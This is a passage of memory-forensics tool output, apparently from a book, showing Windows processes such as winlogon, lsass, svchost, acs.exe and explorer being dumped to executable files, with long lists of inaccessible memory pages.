Memory Not Accessible: Virtual Address: 0x4858a000 File Offset: 0xa000 Size: 0x1000
Memory Not Accessible: Virtual Address: 0x4858c000 File Offset: 0xc000 Size: 0x1000
Memory Not Accessible: Virtual Address: 0x4858d000 File Offset: 0xd000 Size: 0x1000
************************************************************************
Dumping csrss.exe, pid: 888 output: executable.888.exe
Memory Not Accessible: Virtual Address: 0x4a682000 File Offset: 0x2000 Size: 0x1000
Memory Not Accessible: Virtual Address: 0x4a683000 File Offset: 0x3000 Size: 0x1000
************************************************************************
Dumping winlogon.exe, pid: 912 output: executable.912.exe
Memory Not Accessible: Virtual Address: 0x1002000 File Offset: 0x2000 Size: 0x1000
Memory Not Accessible: Virtual Address: 0x1003000 File Offset: 0x3000 Size: 0x1000
Memory Not Accessible: Virtual Address: 0x1004000 File Offset: 0x4000 Size: 0x1000
Memory Not Accessible: Virtual Address: 0x1005000 File Offset: 0x5000 Size: 0x1000
Memory Not Accessible: Virtual Address: 0x100b000 File Offset: 0xb000 Size: 0x1000
Memory Not Accessible: Virtual Address: 0x100c000 File Offset: 0xc000 Size: 0x1000
Memory Not Accessible: Virtual Address: 0x100d000 File Offset: 0xd000 Size: 0x1000
Memory Not Accessible: Virtual Address: 0x100e000 File Offset: 0xe000 Size: 0x1000
Memory Not Accessible: Virtual Address: 0x100f000 File Offset: 0xf000 Size: 0x1000
Memory Not Accessible: Virtual Address: 0x1013000 File Offset: 0x13000 Size: 0x1000
Memory Not Accessible: Virtual Address: 0x1016000 File Offset: 0x16000 Size: 0x1000
Memory Not Accessible: Virtual Address: 0x1017000 File Offset: 0x17000 Size: 0x1000
Memory Not Accessible: Virtual Address: 0x1018000 File Offset: 0x18000 Size: 0x1000
Memory Not Accessible: Virtual Address: 0x1019000 File Offset: 0x19000 Size: 0x1000
Memory Not Accessible: Virtual Address: 0x101a000 File Offset: 0x1a000 Size: 0x1000
Memory Not Accessible: Virtual Address: 0x101e000 File Offset: 0x1e000 Size: 0x1000
Memory Not Accessible: Virtual Address: 0x1023000 File Offset: 0x23000 Size: 0x1000
Memory Not Accessible: Virtual Address: 0x1024000 File Offset: 0x24000 Size: 0x1000
Memory Not Accessible: Virtual Address: 0x1025000 File Offset: 0x25000 Size: 0x1000
Memory Not Accessible: Virtual Address: 0x1028000 File Offset: 0x28000 Size: 0x1000
Memory Not Accessible: Virtual Address: 0x1029000 File Offset: 0x29000 Size: 0x1000
Memory Not Accessible: Virtual Address: 0x102c000 File Offset: 0x2c000 Size: 0x1000
Memory Not Accessible: Virtual Address: 0x102f000 File Offset: 0x2f000 Size: 0x1000
Memory Not Accessible: Virtual Address: 0x1032000 File Offset: 0x32000 Size: 0x1000
Memory Not Accessible: Virtual Address: 0x1035000 File Offset: 0x35000 Size: 0x1000
Memory Not Accessible: Virtual Address: 0x1036000 File Offset: 0x36000 Size: 0x1000
Memory Not Accessible: Virtual Address: 0x1037000 File Offset: 0x37000 Size: 0x1000
Memory Not Accessible: Virtual Address: 0x1038000 File Offset: 0x38000 Size: 0x1000
Memory Not Accessible: Virtual Address: 0x1039000 File Offset: 0x39000 Size: 0x1000
Memory Not Accessible: Virtual Address: 0x103a000 File Offset: 0x3a000 Size: 0x1000
Memory Not Accessible: Virtual Address: 0x103b000 File Offset: 0x3b000 Size: 0x1000
Memory Not Accessible: Virtual Address: 0x103c000 File Offset: 0x3c000 Size: 0x1000
Memory Not Accessible: Virtual Address: 0x103d000 File Offset: 0x3d000 Size: 0x1000
Memory Not Accessible: Virtual Address: 0x103e000 File Offset: 0x3e000 Size: 0x1000
Memory Not Accessible: Virtual Address: 0x103f000 File Offset: 0x3f000 Size: 0x1000
Memory Not Accessible: Virtual Address: 0x1040000 File Offset: 0x40000 Size: 0x1000
Memory Not Accessible: Virtual Address: 0x1041000 File Offset: 0x41000 Size: 0x1000
Memory Not Accessible: Virtual Address: 0x1042000 File Offset: 0x42000 Size: 0x1000
Memory Not Accessible: Virtual Address: 0x1044000 File Offset: 0x44000 Size: 0x1000
Memory Not Accessible: Virtual Address: 0x1045000 File Offset: 0x45000 Size: 0x1000
Memory Not Accessible: Virtual Address: 0x1046000 File Offset: 0x46000 Size: 0x1000
Memory Not Accessible: Virtual Address: 0x1047000 File Offset: 0x47000 Size: 0x1000
Memory Not Accessible: Virtual Address: 0x1049000 File Offset: 0x49000 Size: 0x1000
Memory Not Accessible: Virtual Address: 0x104b000 File Offset: 0x4b000 Size: 0x1000
Memory Not Accessible: Virtual Address: 0x104c000 File Offset: 0x4c000 Size: 0x1000
Memory Not Accessible: Virtual Address: 0x104d000 File Offset: 0x4d000 Size: 0x1000
Memory Not Accessible: Virtual Address: 0x104e000 File Offset: 0x4e000 Size: 0x1000
Memory Not Accessible: Virtual Address: 0x104f000 File Offset: 0x4f000 Size: 0x1000
Memory Not Accessible: Virtual Address: 0x1050000 File Offset: 0x50000 Size: 0x1000
Memory Not Accessible: Virtual Address: 0x1051000 File Offset: 0x51000 Size: 0x1000
Memory Not Accessible: Virtual Address: 0x1052000 File Offset: 0x52000 Size: 0x1000
Memory Not Accessible: Virtual Address: 0x1053000 File Offset: 0x53000 Size: 0x1000
Memory Not Accessible: Virtual Address: 0x1054000 File Offset: 0x54000 Size: 0x1000
122
Memory Not Accessible: Virtual Address: 0x1055000 File Offset: 0x55000 Size: 0x1000
Memory Not Accessible: Virtual Address: 0x1056000 File Offset: 0x56000 Size: 0x1000
Memory Not Accessible: Virtual Address: 0x1057000 File Offset: 0x57000 Size: 0x1000
Memory Not Accessible: Virtual Address: 0x1058000 File Offset: 0x58000 Size: 0x1000
Memory Not Accessible: Virtual Address: 0x105b000 File Offset: 0x5b000 Size: 0x1000
Memory Not Accessible: Virtual Address: 0x105c000 File Offset: 0x5c000 Size: 0x1000
Memory Not Accessible: Virtual Address: 0x105d000 File Offset: 0x5d000 Size: 0x1000
Memory Not Accessible: Virtual Address: 0x105e000 File Offset: 0x5e000 Size: 0x1000
Memory Not Accessible: Virtual Address: 0x1062000 File Offset: 0x62000 Size: 0x1000
Memory Not Accessible: Virtual Address: 0x1065000 File Offset: 0x65000 Size: 0x1000
Memory Not Accessible: Virtual Address: 0x1066000 File Offset: 0x66000 Size: 0x1000
Memory Not Accessible: Virtual Address: 0x1067000 File Offset: 0x67000 Size: 0x1000
Memory Not Accessible: Virtual Address: 0x1068000 File Offset: 0x68000 Size: 0x1000
Memory Not Accessible: Virtual Address: 0x1069000 File Offset: 0x69000 Size: 0x1000
Memory Not Accessible: Virtual Address: 0x106a000 File Offset: 0x6a000 Size: 0x1000
Memory Not Accessible: Virtual Address: 0x106b000 File Offset: 0x6b000 Size: 0x1000
Memory Not Accessible: Virtual Address: 0x106c000 File Offset: 0x6c000 Size: 0x1000
Memory Not Accessible: Virtual Address: 0x106d000 File Offset: 0x6d000 Size: 0x1000
************************************************************************
Dumping services.exe, pid: 956 output: executable.956.exe
Memory Not Accessible: Virtual Address: 0x1011000 File Offset: 0x11000 Size: 0x1000
Memory Not Accessible: Virtual Address: 0x1012000 File Offset: 0x12000 Size: 0x1000
Memory Not Accessible: Virtual Address: 0x1014000 File Offset: 0x13000 Size: 0x1000
Memory Not Accessible: Virtual Address: 0x1015000 File Offset: 0x14000 Size: 0x1000
Memory Not Accessible: Virtual Address: 0x1017000 File Offset: 0x15000 Size: 0x1000
Memory Not Accessible: Virtual Address: 0x1018000 File Offset: 0x16000 Size: 0x1000
************************************************************************
Dumping lsass.exe, pid: 968 output: executable.968.exe
Memory Not Accessible: Virtual Address: 0x1001000 File Offset: 0x1000 Size: 0x1000
Memory Not Accessible: Virtual Address: 0x1002000 File Offset: 0x2000 Size: 0x1000
Memory Not Accessible: Virtual Address: 0x1003000 File Offset: 0x3000 Size: 0x1000
Memory Not Accessible: Virtual Address: 0x1004000 File Offset: 0x4000 Size: 0x1000
************************************************************************
Dumping svchost.exe, pid: 1148 output: executable.1148.exe
Memory Not Accessible: Virtual Address: 0x1003000 File Offset: 0x3000 Size: 0x1000
************************************************************************
Dumping svchost.exe, pid: 1276 output: executable.1276.exe
Memory Not Accessible: Virtual Address: 0x1003000 File Offset: 0x3000 Size: 0x1000
************************************************************************
Dumping svchost.exe, pid: 1568 output: executable.1568.exe
Memory Not Accessible: Virtual Address: 0x1003000 File Offset: 0x3000 Size: 0x1000
************************************************************************
Dumping svchost.exe, pid: 1592 output: executable.1592.exe
Memory Not Accessible: Virtual Address: 0x1003000 File Offset: 0x3000 Size: 0x1000
************************************************************************
Dumping spoolsv.exe, pid: 1788 output: executable.1788.exe
Memory Not Accessible: Virtual Address: 0x1005000 File Offset: 0x5000 Size: 0x1000
Memory Not Accessible: Virtual Address: 0x1006000 File Offset: 0x6000 Size: 0x1000
Memory Not Accessible: Virtual Address: 0x1007000 File Offset: 0x7000 Size: 0x1000
Memory Not Accessible: Virtual Address: 0x1008000 File Offset: 0x8000 Size: 0x1000
Memory Not Accessible: Virtual Address: 0x100b000 File Offset: 0xb000 Size: 0x1000
Memory Not Accessible: Virtual Address: 0x100d000 File Offset: 0xd000 Size: 0x1000
************************************************************************
Dumping acs.exe, pid: 1960 output: executable.1960.exe
Memory Not Accessible: Virtual Address: 0x402000 File Offset: 0x2000 Size: 0x1000
Memory Not Accessible: Virtual Address: 0x407000 File Offset: 0x7000 Size: 0x1000
Memory Not Accessible: Virtual Address: 0x40a000 File Offset: 0xa000 Size: 0x1000
Memory Not Accessible: Virtual Address: 0x40b000 File Offset: 0xb000 Size: 0x1000
Memory Not Accessible: Virtual Address: 0x40d000 File Offset: 0xd000 Size: 0x1000
Memory Not Accessible: Virtual Address: 0x40e000 File Offset: 0xe000 Size: 0x1000
Memory Not Accessible: Virtual Address: 0x40f000 File Offset: 0xf000 Size: 0x1000
Memory Not Accessible: Virtual Address: 0x410000 File Offset: 0x10000 Size: 0x1000
Memory Not Accessible: Virtual Address: 0x411000 File Offset: 0x11000 Size: 0x1000
Memory Not Accessible: Virtual Address: 0x412000 File Offset: 0x12000 Size: 0x1000
Memory Not Accessible: Virtual Address: 0x413000 File Offset: 0x13000 Size: 0x1000
Memory Not Accessible: Virtual Address: 0x414000 File Offset: 0x14000 Size: 0x1000
Memory Not Accessible: Virtual Address: 0x415000 File Offset: 0x15000 Size: 0x1000
Memory Not Accessible: Virtual Address: 0x417000 File Offset: 0x17000 Size: 0x1000
Memory Not Accessible: Virtual Address: 0x418000 File Offset: 0x18000 Size: 0x1000
Memory Not Accessible: Virtual Address: 0x419000 File Offset: 0x19000 Size: 0x1000
Memory Not Accessible: Virtual Address: 0x41b000 File Offset: 0x1b000 Size: 0x1000
123
Memory Not Accessible: Virtual Address: 0x41c000 File Offset: 0x1c000 Size: 0x1000
Memory Not Accessible: Virtual Address: 0x41d000 File Offset: 0x1d000 Size: 0x1000
Memory Not Accessible: Virtual Address: 0x41e000 File Offset: 0x1e000 Size: 0x1000
Memory Not Accessible: Virtual Address: 0x41f000 File Offset: 0x1f000 Size: 0x1000
Memory Not Accessible: Virtual Address: 0x420000 File Offset: 0x20000 Size: 0x1000
Memory Not Accessible: Virtual Address: 0x422000 File Offset: 0x22000 Size: 0x1000
Memory Not Accessible: Virtual Address: 0x424000 File Offset: 0x24000 Size: 0x1000
Memory Not Accessible: Virtual Address: 0x425000 File Offset: 0x25000 Size: 0x1000
Memory Not Accessible: Virtual Address: 0x426000 File Offset: 0x26000 Size: 0x1000
Memory Not Accessible: Virtual Address: 0x427000 File Offset: 0x27000 Size: 0x1000
Memory Not Accessible: Virtual Address: 0x429000 File Offset: 0x29000 Size: 0x1000
Memory Not Accessible: Virtual Address: 0x42a000 File Offset: 0x2a000 Size: 0x1000
Memory Not Accessible: Virtual Address: 0x42b000 File Offset: 0x2b000 Size: 0x1000
Memory Not Accessible: Virtual Address: 0x42c000 File Offset: 0x2c000 Size: 0x1000
Memory Not Accessible: Virtual Address: 0x42d000 File Offset: 0x2d000 Size: 0x1000
Memory Not Accessible: Virtual Address: 0x42e000 File Offset: 0x2e000 Size: 0x1000
Memory Not Accessible: Virtual Address: 0x42f000 File Offset: 0x2f000 Size: 0x1000
Memory Not Accessible: Virtual Address: 0x430000 File Offset: 0x30000 Size: 0x1000
Memory Not Accessible: Virtual Address: 0x431000 File Offset: 0x31000 Size: 0x1000
Memory Not Accessible: Virtual Address: 0x432000 File Offset: 0x32000 Size: 0x1000
Memory Not Accessible: Virtual Address: 0x43a000 File Offset: 0x3a000 Size: 0x1000
Memory Not Accessible: Virtual Address: 0x43b000 File Offset: 0x3b000 Size: 0x1000
Memory Not Accessible: Virtual Address: 0x43f000 File Offset: 0x3f000 Size: 0x1000
Memory Not Accessible: Virtual Address: 0x442000 File Offset: 0x42000 Size: 0x1000
Memory Not Accessible: Virtual Address: 0x445000 File Offset: 0x45000 Size: 0x1000
Memory Not Accessible: Virtual Address: 0x446000 File Offset: 0x46000 Size: 0x1000
Memory Not Accessible: Virtual Address: 0x447000 File Offset: 0x47000 Size: 0x1000
Memory Not Accessible: Virtual Address: 0x448000 File Offset: 0x48000 Size: 0x1000
Memory Not Accessible: Virtual Address: 0x449000 File Offset: 0x49000 Size: 0x1000
Memory Not Accessible: Virtual Address: 0x44c000 File Offset: 0x4c000 Size: 0x1000
Memory Not Accessible: Virtual Address: 0x44d000 File Offset: 0x4d000 Size: 0x1000
Memory Not Accessible: Virtual Address: 0x44e000 File Offset: 0x4e000 Size: 0x1000
Memory Not Accessible: Virtual Address: 0x44f000 File Offset: 0x4f000 Size: 0x1000
Memory Not Accessible: Virtual Address: 0x450000 File Offset: 0x50000 Size: 0x1000
Memory Not Accessible: Virtual Address: 0x453000 File Offset: 0x53000 Size: 0x1000
Memory Not Accessible: Virtual Address: 0x454000 File Offset: 0x54000 Size: 0x1000
Memory Not Accessible: Virtual Address: 0x456000 File Offset: 0x56000 Size: 0x1000
Memory Not Accessible: Virtual Address: 0x457000 File Offset: 0x57000 Size: 0x1000
Memory Not Accessible: Virtual Address: 0x458000 File Offset: 0x58000 Size: 0x1000
Memory Not Accessible: Virtual Address: 0x459000 File Offset: 0x59000 Size: 0x1000
Memory Not Accessible: Virtual Address: 0x45a000 File Offset: 0x5a000 Size: 0x1000
Memory Not Accessible: Virtual Address: 0x45b000 File Offset: 0x5b000 Size: 0x1000
Memory Not Accessible: Virtual Address: 0x463000 File Offset: 0x63000 Size: 0x1000
Memory Not Accessible: Virtual Address: 0x464000 File Offset: 0x64000 Size: 0x1000
Memory Not Accessible: Virtual Address: 0x465000 File Offset: 0x65000 Size: 0x1000
Memory Not Accessible: Virtual Address: 0x466000 File Offset: 0x66000 Size: 0x1000
Memory Not Accessible: Virtual Address: 0x467000 File Offset: 0x67000 Size: 0x1000
Memory Not Accessible: Virtual Address: 0x469000 File Offset: 0x69000 Size: 0x1000
Memory Not Accessible: Virtual Address: 0x46b000 File Offset: 0x6b000 Size: 0x1000
Memory Not Accessible: Virtual Address: 0x470000 File Offset: 0x70000 Size: 0x1000
************************************************************************
Dumping explorer.exe, pid: 1656 output: executable.1656.exe
Memory Not Accessible: Virtual Address: 0x1022000 File Offset: 0x22000 Size: 0x1000
Memory Not Accessible: Virtual Address: 0x1027000 File Offset: 0x27000 Size: 0x1000
Memory Not Accessible: Virtual Address: 0x102c000 File Offset: 0x29000 Size: 0x1000
Memory Not Accessible: Virtual Address: 0x102d000 File Offset: 0x2a000 Size: 0x1000
Memory Not Accessible: Virtual Address: 0x102e000 File Offset: 0x2b000 Size: 0x1000
Memory Not Accessible: Virtual Address: 0x1030000 File Offset: 0x2d000 Size: 0x1000
Memory Not Accessible: Virtual Address: 0x1031000 File Offset: 0x2e000 Size: 0x1000
Memory Not Accessible: Virtual Address: 0x1032000 File Offset: 0x2f000 Size: 0x1000
Memory Not Accessible: Virtual Address: 0x1033000 File Offset: 0x30000 Size: 0x1000
Memory Not Accessible: Virtual Address: 0x103c000 File Offset: 0x37000 Size: 0x1000
Memory Not Accessible: Virtual Address: 0x103d000 File Offset: 0x38000 Size: 0x1000
Memory Not Accessible: Virtual Address: 0x1046000 File Offset: 0x40000 Size: 0x1000
Memory Not Accessible: Virtual Address: 0x1047000 File Offset: 0x41000 Size: 0x1000
Memory Not Accessible: Virtual Address: 0x1048000 File Offset: 0x42000 Size: 0x1000
Memory Not Accessible: Virtual Address: 0x1049000 File Offset: 0x43000 Size: 0x1000
Memory Not Accessible: Virtual Address: 0x104a000 File Offset: 0x44000 Size: 0x1000
Memory Not Accessible: Virtual Address: 0x104b000 File Offset: 0x45000 Size: 0x1000
Memory Not Accessible: Virtual Address: 0x104c000 File Offset: 0x46000 Size: 0x1000
Memory Not Accessible: Virtual Address: 0x104d000 File Offset: 0x47000 Size: 0x1000
124
Memory Not Accessible: Virtual Address: 0x104e000 File Offset: 0x48000 Size: 0x1000
Memory Not Accessible: Virtual Address: 0x104f000 File Offset: 0x49000 Size: 0x1000
Memory Not Accessible: Virtual Address: 0x1050000 File Offset: 0x4a000 Size: 0x1000
Memory Not Accessible: Virtual Address: 0x1051000 File Offset: 0x4b000 Size: 0x1000
Memory Not Accessible: Virtual Address: 0x1052000 File Offset: 0x4c000 Size: 0x1000
Memory Not Accessible: Virtual Address: 0x1053000 File Offset: 0x4d000 Size: 0x1000
Memory Not Accessible: Virtual Address: 0x1054000 File Offset: 0x4e000 Size: 0x1000
Memory Not Accessible: Virtual Address: 0x1055000 File Offset: 0x4f000 Size: 0x1000
Memory Not Accessible: Virtual Address: 0x1056000 File Offset: 0x50000 Size: 0x1000
Memory Not Accessible: Virtual Address: 0x1057000 File Offset: 0x51000 Size: 0x1000
Memory Not Accessible: Virtual Address: 0x1058000 File Offset: 0x52000 Size: 0x1000
Memory Not Accessible: Virtual Address: 0x1059000 File Offset: 0x53000 Size: 0x1000
Memory Not Accessible: Virtual Address: 0x105a000 File Offset: 0x54000 Size: 0x1000
Memory Not Accessible: Virtual Address: 0x105b000 File Offset: 0x55000 Size: 0x1000
Memory Not Accessible: Virtual Address: 0x105c000 File Offset: 0x56000 Size: 0x1000
Memory Not Accessible: Virtual Address: 0x105d000 File Offset: 0x57000 Size: 0x1000
Memory Not Accessible: Virtual Address: 0x105e000 File Offset: 0x58000 Size: 0x1000
Memory Not Accessible: Virtual Address: 0x105f000 File Offset: 0x59000 Size: 0x1000
Memory Not Accessible: Virtual Address: 0x1060000 File Offset: 0x5a000 Size: 0x1000
Memory Not Accessible: Virtual Address: 0x1061000 File Offset: 0x5b000 Size: 0x1000
Memory Not Accessible: Virtual Address: 0x1062000 File Offset: 0x5c000 Size: 0x1000
Memory Not Accessible: Virtual Address: 0x1063000 File Offset: 0x5d000 Size: 0x1000
Memory Not Accessible: Virtual Address: 0x1064000 File Offset: 0x5e000 Size: 0x1000
Memory Not Accessible: Virtual Address: 0x1065000 File Offset: 0x5f000 Size: 0x1000
Memory Not Accessible: Virtual Address: 0x1066000 File Offset: 0x60000 Size: 0x1000
Memory Not Accessible: Virtual Address: 0x1067000 File Offset: 0x61000 Size: 0x1000
Memory Not Accessible: Virtual Address: 0x1068000 File Offset: 0x62000 Size: 0x1000
Memory Not Accessible: Virtual Address: 0x1069000 File Offset: 0x63000 Size: 0x1000
Memory Not Accessible: Virtual Address: 0x106a000 File Offset: 0x64000 Size: 0x1000
Memory Not Accessible: Virtual Address: 0x106b000 File Offset: 0x65000 Size: 0x1000
Memory Not Accessible: Virtual Address: 0x106c000 File Offset: 0x66000 Size: 0x1000
Memory Not Accessible: Virtual Address: 0x106d000 File Offset: 0x67000 Size: 0x1000
Memory Not Accessible: Virtual Address: 0x106e000 File Offset: 0x68000 Size: 0x1000
Memory Not Accessible: Virtual Address: 0x106f000 File Offset: 0x69000 Size: 0x1000
Memory Not Accessible: Virtual Address: 0x1070000 File Offset: 0x6a000 Size: 0x1000
Memory Not Accessible: Virtual Address: 0x1071000 File Offset: 0x6b000 Size: 0x1000
Memory Not Accessible: Virtual Address: 0x1072000 File Offset: 0x6c000 Size: 0x1000
Memory Not Accessible: Virtual Address: 0x1073000 File Offset: 0x6d000 Size: 0x1000
Memory Not Accessible: Virtual Address: 0x1074000 File Offset: 0x6e000 Size: 0x1000
Memory Not Accessible: Virtual Address: 0x1075000 File Offset: 0x6f000 Size: 0x1000
Memory Not Accessible: Virtual Address: 0x1076000 File Offset: 0x70000 Size: 0x1000
Memory Not Accessible: Virtual Address: 0x1077000 File Offset: 0x71000 Size: 0x1000
Memory Not Accessible: Virtual Address: 0x1078000 File Offset: 0x72000 Size: 0x1000
Memory Not Accessible: Virtual Address: 0x1079000 File Offset: 0x73000 Size: 0x1000
Memory Not Accessible: Virtual Address: 0x107a000 File Offset: 0x74000 Size: 0x1000
Memory Not Accessible: Virtual Address: 0x107b000 File Offset: 0x75000 Size: 0x1000
Memory Not Accessible: Virtual Address: 0x107c000 File Offset: 0x76000 Size: 0x1000
Memory Not Accessible: Virtual Address: 0x107d000 File Offset: 0x77000 Size: 0x1000
Memory Not Accessible: Virtual Address: 0x107e000 File Offset: 0x78000 Size: 0x1000
Memory Not Accessible: Virtual Address: 0x107f000 File Offset: 0x79000 Size: 0x1000
Memory Not Accessible: Virtual Address: 0x1080000 File Offset: 0x7a000 Size: 0x1000
Memory Not Accessible: Virtual Address: 0x1081000 File Offset: 0x7b000 Size: 0x1000
Memory Not Accessible: Virtual Address: 0x1082000 File Offset: 0x7c000 Size: 0x1000
Memory Not Accessible: Virtual Address: 0x1083000 File Offset: 0x7d000 Size: 0x1000
Memory Not Accessible: Virtual Address: 0x1084000 File Offset: 0x7e000 Size: 0x1000
Memory Not Accessible: Virtual Address: 0x1085000 File Offset: 0x7f000 Size: 0x1000
Memory Not Accessible: Virtual Address: 0x1086000 File Offset: 0x80000 Size: 0x1000
Memory Not Accessible: Virtual Address: 0x1087000 File Offset: 0x81000 Size: 0x1000
Memory Not Accessible: Virtual Address: 0x1088000 File Offset: 0x82000 Size: 0x1000
Memory Not Accessible: Virtual Address: 0x1089000 File Offset: 0x83000 Size: 0x1000
Memory Not Accessible: Virtual Address: 0x108a000 File Offset: 0x84000 Size: 0x1000
Memory Not Accessible: Virtual Address: 0x108b000 File Offset: 0x85000 Size: 0x1000
Memory Not Accessible: Virtual Address: 0x108c000 File Offset: 0x86000 Size: 0x1000
Memory Not Accessible: Virtual Address: 0x108d000 File Offset: 0x87000 Size: 0x1000
Memory Not Accessible: Virtual Address: 0x108e000 File Offset: 0x88000 Size: 0x1000
Memory Not Accessible: Virtual Address: 0x108f000 File Offset: 0x89000 Size: 0x1000
Memory Not Accessible: Virtual Address: 0x1090000 File Offset: 0x8a000 Size: 0x1000
Memory Not Accessible: Virtual Address: 0x1091000 File Offset: 0x8b000 Size: 0x1000
Memory Not Accessible: Virtual Address: 0x1092000 File Offset: 0x8c000 Size: 0x1000
Memory Not Accessible: Virtual Address: 0x1093000 File Offset: 0x8d000 Size: 0x1000
Memory Not Accessible: Virtual Address: 0x1094000 File Offset: 0x8e000 Size: 0x1000
125
Memory Not Accessible: Virtual Address: 0x1095000 File Offset: 0x8f000 Size: 0x1000
Memory Not Accessible: Virtual Address: 0x1096000 File Offset: 0x90000 Size: 0x1000
Memory Not Accessible: Virtual Address: 0x1097000 File Offset: 0x91000 Size: 0x1000
Memory Not Accessible: Virtual Address: 0x1098000 File Offset: 0x92000 Size: 0x1000
Memory Not Accessible: Virtual Address: 0x1099000 File Offset: 0x93000 Size: 0x1000
Memory Not Accessible: Virtual Address: 0x109a000 File Offset: 0x94000 Size: 0x1000
Memory Not Accessible: Virtual Address: 0x109b000 File Offset: 0x95000 Size: 0x1000
Memory Not Accessible: Virtual Address: 0x109c000 File Offset: 0x96000 Size: 0x1000
Memory Not Accessible: Virtual Address: 0x109d000 File Offset: 0x97000 Size: 0x1000
Memory Not Accessible: Virtual Address: 0x109e000 File Offset: 0x98000 Size: 0x1000
Memory Not Accessible: Virtual Address: 0x109f000 File Offset: 0x99000 Size: 0x1000
Memory Not Accessible: Virtual Address: 0x10a0000 File Offset: 0x9a000 Size: 0x1000
Memory Not Accessible: Virtual Address: 0x10a1000 File Offset: 0x9b000 Size: 0x1000
Memory Not Accessible: Virtual Address: 0x10a2000 File Offset: 0x9c000 Size: 0x1000
Memory Not Accessible: Virtual Address: 0x10a3000 File Offset: 0x9d000 Size: 0x1000
Memory Not Accessible: Virtual Address: 0x10a4000 File Offset: 0x9e000 Size: 0x1000
Memory Not Accessible: Virtual Address: 0x10a5000 File Offset: 0x9f000 Size: 0x1000
Memory Not Accessible: Virtual Address: 0x10a6000 File Offset: 0xa0000 Size: 0x1000
Memory Not Accessible: Virtual Address: 0x10a7000 File Offset: 0xa1000 Size: 0x1000
Memory Not Accessible: Virtual Address: 0x10a8000 File Offset: 0xa2000 Size: 0x1000
Memory Not Accessible: Virtual Address: 0x10a9000 File Offset: 0xa3000 Size: 0x1000
Memory Not Accessible: Virtual Address: 0x10aa000 File Offset: 0xa4000 Size: 0x1000
Memory Not Accessible: Virtual Address: 0x10ab000 File Offset: 0xa5000 Size: 0x1000
Memory Not Accessible: Virtual Address: 0x10ac000 File Offset: 0xa6000 Size: 0x1000
Memory Not Accessible: Virtual Address: 0x10ad000 File Offset: 0xa7000 Size: 0x1000
Memory Not Accessible: Virtual Address: 0x10ae000 File Offset: 0xa8000 Size: 0x1000
Memory Not Accessible: Virtual Address: 0x10af000 File Offset: 0xa9000 Size: 0x1000
Memory Not Accessible: Virtual Address: 0x10b0000 File Offset: 0xaa000 Size: 0x1000
Memory Not Accessible: Virtual Address: 0x10b1000 File Offset: 0xab000 Size: 0x1000
Memory Not Accessible: Virtual Address: 0x10b2000 File Offset: 0xac000 Size: 0x1000
Memory Not Accessible: Virtual Address: 0x10b3000 File Offset: 0xad000 Size: 0x1000
Memory Not Accessible: Virtual Address: 0x10b4000 File Offset: 0xae000 Size: 0x1000
Memory Not Accessible: Virtual Address: 0x10b5000 File Offset: 0xaf000 Size: 0x1000
Memory Not Accessible: Virtual Address: 0x10b6000 File Offset: 0xb0000 Size: 0x1000
Memory Not Accessible: Virtual Address: 0x10b7000 File Offset: 0xb1000 Size: 0x1000
Memory Not Accessible: Virtual Address: 0x10b8000 File Offset: 0xb2000 Size: 0x1000
Memory Not Accessible: Virtual Address: 0x10b9000 File Offset: 0xb3000 Size: 0x1000
Memory Not Accessible: Virtual Address: 0x10ba000 File Offset: 0xb4000 Size: 0x1000
Memory Not Accessible: Virtual Address: 0x10bb000 File Offset: 0xb5000 Size: 0x1000
Memory Not Accessible: Virtual Address: 0x10bc000 File Offset: 0xb6000 Size: 0x1000
Memory Not Accessible: Virtual Address: 0x10bd000 File Offset: 0xb7000 Size: 0x1000
Memory Not Accessible: Virtual Address: 0x10be000 File Offset: 0xb8000 Size: 0x1000
Memory Not Accessible: Virtual Address: 0x10bf000 File Offset: 0xb9000 Size: 0x1000
Memory Not Accessible: Virtual Address: 0x10c0000 File Offset: 0xba000 Size: 0x1000
Memory Not Accessible: Virtual Address: 0x10c1000 File Offset: 0xbb000 Size: 0x1000
Memory Not Accessible: Virtual Address: 0x10c2000 File Offset: 0xbc000 Size: 0x1000
Memory Not Accessible: Virtual Address: 0x10c3000 File Offset: 0xbd000 Size: 0x1000
Memory Not Accessible: Virtual Address: 0x10c4000 File Offset: 0xbe000 Size: 0x1000
Memory Not Accessible: Virtual Address: 0x10c5000 File Offset: 0xbf000 Size: 0x1000
Memory Not Accessible: Virtual Address: 0x10c6000 File Offset: 0xc0000 Size: 0x1000
Memory Not Accessible: Virtual Address: 0x10c7000 File Offset: 0xc1000 Size: 0x1000
Memory Not Accessible: Virtual Address: 0x10c8000 File Offset: 0xc2000 Size: 0x1000
Memory Not Accessible: Virtual Address: 0x10c9000 File Offset: 0xc3000 Size: 0x1000
Memory Not Accessible: Virtual Address: 0x10ca000 File Offset: 0xc4000 Size: 0x1000
Memory Not Accessible: Virtual Address: 0x10cb000 File Offset: 0xc5000 Size: 0x1000
Memory Not Accessible: Virtual Address: 0x10cc000 File Offset: 0xc6000 Size: 0x1000
Memory Not Accessible: Virtual Address: 0x10cd000 File Offset: 0xc7000 Size: 0x1000
Memory Not Accessible: Virtual Address: 0x10ce000 File Offset: 0xc8000 Size: 0x1000
Memory Not Accessible: Virtual Address: 0x10cf000 File Offset: 0xc9000 Size: 0x1000
Memory Not Accessible: Virtual Address: 0x10d0000 File Offset: 0xca000 Size: 0x1000
Memory Not Accessible: Virtual Address: 0x10d1000 File Offset: 0xcb000 Size: 0x1000
Memory Not Accessible: Virtual Address: 0x10d2000 File Offset: 0xcc000 Size: 0x1000
Memory Not Accessible: Virtual Address: 0x10d3000 File Offset: 0xcd000 Size: 0x1000
Memory Not Accessible: Virtual Address: 0x10d4000 File Offset: 0xce000 Size: 0x1000
Memory Not Accessible: Virtual Address: 0x10d5000 File Offset: 0xcf000 Size: 0x1000
Memory Not Accessible: Virtual Address: 0x10d6000 File Offset: 0xd0000 Size: 0x1000
Memory Not Accessible: Virtual Address: 0x10d7000 File Offset: 0xd1000 Size: 0x1000
Memory Not Accessible: Virtual Address: 0x10d8000 File Offset: 0xd2000 Size: 0x1000
Memory Not Accessible: Virtual Address: 0x10d9000 File Offset: 0xd3000 Size: 0x1000
Memory Not Accessible: Virtual Address: 0x10da000 File Offset: 0xd4000 Size: 0x1000
Memory Not Accessible: Virtual Address: 0x10db000 File Offset: 0xd5000 Size: 0x1000
126
Memory Not Accessible: Virtual Address: 0x10dc000 File Offset: 0xd6000 Size: 0x1000
Memory Not Accessible: Virtual Address: 0x10dd000 File Offset: 0xd7000 Size: 0x1000
Memory Not Accessible: Virtual Address: 0x10de000 File Offset: 0xd8000 Size: 0x1000
Memory Not Accessible: Virtual Address: 0x10df000 File Offset: 0xd9000 Size: 0x1000
